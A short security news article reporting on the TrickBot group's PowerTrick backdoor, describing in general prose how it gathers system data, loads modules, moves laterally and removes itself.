The TrickBot hacking group is back in the news with a new backdoor Trojan called PowerTrick. The TrickBot hacking group tends to target businesses and institutions involved in the financial sector. The PowerTrick backdoor Trojan is not used as a first-stage payload. Instead, the TrickBot hackers employ it at a later stage of the campaign as it would ensure further control over the infected system. The TrickBot hacking group consists of very experienced individuals who know what they are doing when it comes to cybercrime. This is no surprise that once again, they are going after high-end targets. Of course, to carry out a successful campaign against such targets, the TrickBot group employs very high-quality hacking tools that employ impressive evasion techniques.
The PowerTrick Trojan is Very Flexible Threatening
After detecting the activity of the PowerTrick backdoor Trojan on a compromised system, malware analysts studied it and found that to launch the threat, the TrickBot hackers are using the Windows PowerShell. Upon execution, the PowerTrick Trojan would begin collecting data regarding the compromised system’s hardware and software. Once the information in question is gathered successfully, the PowerTrick backdoor Trojan would transfer it to its operators’ C&C (Command & Control) server. To make the PowerTrick Trojan more flexible, the TrickBot hacking group has used the Metasploit framework. To add more flexibility, they also have employed custom-developed PowerShell tools. Doing this ensures that the operators of the PowerTrick backdoor Trojan can execute a very wide range of activities on the compromised system by loading and unloading different modules that serve different purposes.
Apart from the aforementioned capabilities, the PowerTrick backdoor Trojan also is able to transfer itself to network drives, as well as the attached systems. This nasty backdoor Trojan also is capable of planting additional malware on the infected system. The PowerTrick threat also can wipe out files that are no longer needed to reduce its footprint. Furthermore, the PowerTrick malware is capable of fully uninstalling itself from the compromised machine, which means that the victims may never even know that their systems have been infected. The fact that the PowerTrick backdoor Trojan can move laterally makes it threatenin, particularly because it can manage to compromise its target via another infected system connected to the same network.
The TrickBot group is a very prominent name in the world of cybercrime. These hackers are highly skilled and very persistent. They are known to update their tools and add new malware to their arsenal on a regular basis.